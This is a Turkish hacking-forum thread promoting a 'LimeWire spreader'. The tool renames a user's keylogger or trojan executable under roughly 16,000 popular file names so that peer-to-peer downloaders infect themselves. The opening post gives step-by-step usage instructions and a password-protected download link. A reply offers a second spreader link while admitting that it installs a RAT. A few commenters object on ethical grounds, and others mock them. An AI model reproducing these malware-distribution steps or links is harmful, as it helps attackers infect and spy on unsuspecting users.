Harika Bir Limewire Spreader
-
S.a arkadaşlar bugün kullandığım ve garanti çalışan süper bi spreader paylaşıcam.
Bu spreaderdan bir ss
http://localhostr.com/files/673fc1/2.jpg
arkadaşlar bu spreader limewiredaki tüm herşeyin adını kopyalıyor.
sonra sizin virüsünüze sırayla bu adların hepsini veriyor :)
benim virüsü 16000 civarında farklı adda kaydetti :)
sonra sizde bu 16000 civarı dosyayı limewire atıyorsunuz vee o 16000 programdan birini arayan şak size rastlıyor :)
Bence güzel bi spread yöntemi tavsiye ederim
Programın anlatımına gelince
How To Use
#0 Open
#1 Click Menu
#2 Click Start Grab (Grabs 15000+)
#3 Make New Folder On Desktop
#4 Put Your Bot Into The Folder
#5 Start Copy
#6 Dont Touch It While Its On
#7 Once Done With All The Files Open LimeWire
#8 Click Library
#9 Drag All The 15000+ Into The Box In LimeWire
#10 Leave Fot A Few Sec It Takes Time
#11 Once The Screen Pops Up Click Select All
#12 Leave For 10 Min Or So Then It Uploads Then All
#13 Sit Back And Watch The Bots Come Inorjinali böyle ben dilim döndüğünce anlatıyım.
Programı açın.
Menüye tıklayın.
Start graba tıklayın.
Sonra masaüstünde virüsgrablencek diye bi klasör açın(adı farketmez ben öyle açtım)
Virüsgrablencek klasörüne kendi keylog-trojan vb. serverınızı koyun adı x.exe olsun mesela
Bu arada program isimleri yakalıyor. 16000 gibi bi sayıya gelince kendiliğinden bitcek ve artık isim yakalamıcak
Bitince start copy diceksiniz ve virüsgrablencek klasöründen x.exe yi seçin
Sonrada gene aynı klasörde tamama tıklayıp geçin.
Şimdi program sizin serverınıza o 16000 civarındaki isimi vercek :)
Sonrada siz o klasörü limewire atcaksınız bu kadar :)
Programın linki
http://www.multiupload.com/SVS5WP8DK9
Pass: level-23.comalıntı yeri belli zaten :)
-
iyiymiş indrim blunsun lazım olur :D
-
bana rar spreader lazım :)) bulabilecek varsa minnettar kalıcam ( fud olması gerekmiyor )
-
HoLyZone bunu yazdı:
-----------------------------
bana rar spreader lazım :)) bulabilecek varsa minnettar kalıcam ( fud olması gerekmiyor )
-----------------------------hoca bitane var hatta facebook spreader bile var ama programda backdoor tespit ettim.
yükledikten sonra process explorerla takip edince farkettim windowsun benim bile girme iznimin olmadığı klasörlere kopyaladı ratı :)
istersen genede veriyim: resimi: http://img17.imageshack.us/img17/536/screenshot0zd.jpg
link:http://www.multiupload.com/NMX9VBRXTF
-
gkhn759 bunu yazdı:
-----------------------------
yani bunu nerede yazdığımın farkındayım, muhtemelen normal da görünüyor ama kendi şahsıma iyiy bok yiyorsunuz diyorum. Bunu benm senn gibi adamlar yemez de benm ilkokula giden kardeşim yada 70kusur yaşında dedem yer, makinalarını bok edersiniz. Afferin amk, bok yedin.
Not: Bide bunu yazarken sa diye başlamanız yok mu, zihniyetine de sokayım senn
-----------------------------ne sitesinde bunu yazıyosun hocam
-
cuneyd bunu yazdı:
-----------------------------
niye insanlara boyle seyler bulastiriyorsunuz ki :|
yazik yazik :| cok sükür o tür programlar ile birseyler aramiyorum / indirmiyorum :|
-----------------------------
bu virüs için antivirüsün veritabanını güncelleyip ilk x antivürüs tespit etti falanca virüsü etkisiz kıldı bu virüsü temizleyip çoğunluk kitle üstünde etki bırakmak gibi yada antivür kuran /pcye bakım yapan teknik servis kazansın ekonomi canlansın ya da yedirmeye çalıştığın trojansa ddos için zombi pc ordusu oluşturim vb gibi olayları yoksa sanıyorum ki ego tatmini adamı büyük ihtimal tanımıyosun etmiyosun bi karı zararı yok sana zarar sadece adama insanlara sebepsiz hastalıklı şırınga batırmak gibi bi çeşit vandalizm diyebilir miyiz öyleyse -
Crack34 bunu yazdı:
-----------------------------
pcdoktor636 bunu yazdı:
-----------------------------
kökten devrimci bir HACK sitesi burası.
Napıyorsunuz siz burda anlamadım
Hack sitesinde ne planlıyordunuz?
Sevgi kardeşlik dünya yaşasın pembe panjurlu villam falanmı?
2dk düşünün nerdesiniz
-----------------------------usta tamam da insanların da iyi niyetlerini suistimal etmek doğru mu sence? :)
-----------------------------Şarkıcıların haklarına tecavüz edip korsan mp3 kullanmak iyi niyetmidir :D
-
Bir albümün CD'sini en fazla 5 liraya üretip, 20 liraya satmak ne kadar iyi niyetse.
Mp3 indirmek o kadar iyi niyettir bence :D
-
DE5TROY3R bunu yazdı:
-----------------------------
Crack34 bunu yazdı:
-----------------------------
pcdoktor636 bunu yazdı:
-----------------------------
kökten devrimci bir HACK sitesi burası.
Napıyorsunuz siz burda anlamadım
Hack sitesinde ne planlıyordunuz?
Sevgi kardeşlik dünya yaşasın pembe panjurlu villam falanmı?
2dk düşünün nerdesiniz
-----------------------------usta tamam da insanların da iyi niyetlerini suistimal etmek doğru mu sence? :)
-----------------------------Şarkıcıların haklarına tecavüz edip korsan mp3 kullanmak iyi niyetmidir :D
-----------------------------hoba :D sözün bittiği nokta bence :)
-
La tamam hackleyin yaw hackleyin bişey demiyorum :D
-
Crack34 bunu yazdı:
-----------------------------
Ben çok mp3 indiririm limewire'den.
Şimdi sen veya senin gibi düşünen insanların virüslerinide indirmiş olucam
Sonra bi ton söv :D
-----------------------------Hocam mp3 ile exe arasındaki farkı idrak edemiyosan bilgisayar kullanma, kullanıyosan da niye virüs bulaştı diye isyan etme lütfen :D
